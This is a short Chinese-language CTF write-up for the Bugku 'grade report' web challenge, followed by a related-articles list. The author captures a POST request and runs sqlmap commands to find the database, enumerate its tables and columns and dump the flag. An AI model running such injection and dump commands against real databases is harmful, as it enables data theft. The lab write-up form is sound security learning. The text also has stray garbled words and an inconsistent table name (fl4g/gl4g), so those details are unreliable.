【Writeup】Bugku-Web-成績單
打開來是成績查詢的界面sql
隨便輸入一下1獲得:數據庫
基本已經能肯定是sql注入的題了,但這道題沒有回顯,手動測試很麻煩(我也不太會),因此用sqlmappost
burp抓包,發現是一個post請求,將請求內容複製下來在kali中保存爲一個txt(這樣要比直接測試url快)測試
(此處插播一個小點——剛配置好的kali是不能直接獲取物理機上剪貼板的內容的,須要執行如下操做:url
接下來經過sqlmap找當前數據庫的名字:spa
1 sqlmap -r chengji.txt -p id --current-db
繼續查找其中的tables:3d
1 sqlmap -r chengji.txt -p id -D skctf_flag --tables
flag應該在fl4g這個表中,繼續查找字段:code
1 sqlmap -r chengji.txt -p id -D skctf_flag -T gl4g --columns
只有一個字段就是咱們須要的flag,查看一下它的內容:blog
1 sqlmap -r chengji.txt -p id -D skctf_flag -T gl4g -C skctf_flag --dump
獲得flagio
我本次使用sqlmap的時候不知道爲何特別慢,老是出現下面這句話,不知道怎麼能解決一下
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')?
相關文章
- 1. bugku成績單(sql注入)writeup
- 2. bugku成績單
- 3. Vue成績單
- 4. BugkuCTF 成績單
- 5. Bugku:web 成績單
- 6. 成績單
- 7. BugkuCTF-Web-成績單
- 8. 成績單 (bugku--web)
- 9. BugKu之成績單
- 10. [LOJ2292] [THUSC2016] 成績單
- 更多相關文章...
- • Eclipse 生成jar包 - Eclipse 教程
- • jQuery Mobile 表單 - jQuery Mobile 教程
- • TiDB 在摩拜單車在線數據業務的應用和實踐
- • 三篇文章瞭解 TiDB 技術內幕——說存儲
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. bugku成績單(sql注入)writeup
- 2. bugku成績單
- 3. Vue成績單
- 4. BugkuCTF 成績單
- 5. Bugku:web 成績單
- 6. 成績單
- 7. BugkuCTF-Web-成績單
- 8. 成績單 (bugku--web)
- 9. BugKu之成績單
- 10. [LOJ2292] [THUSC2016] 成績單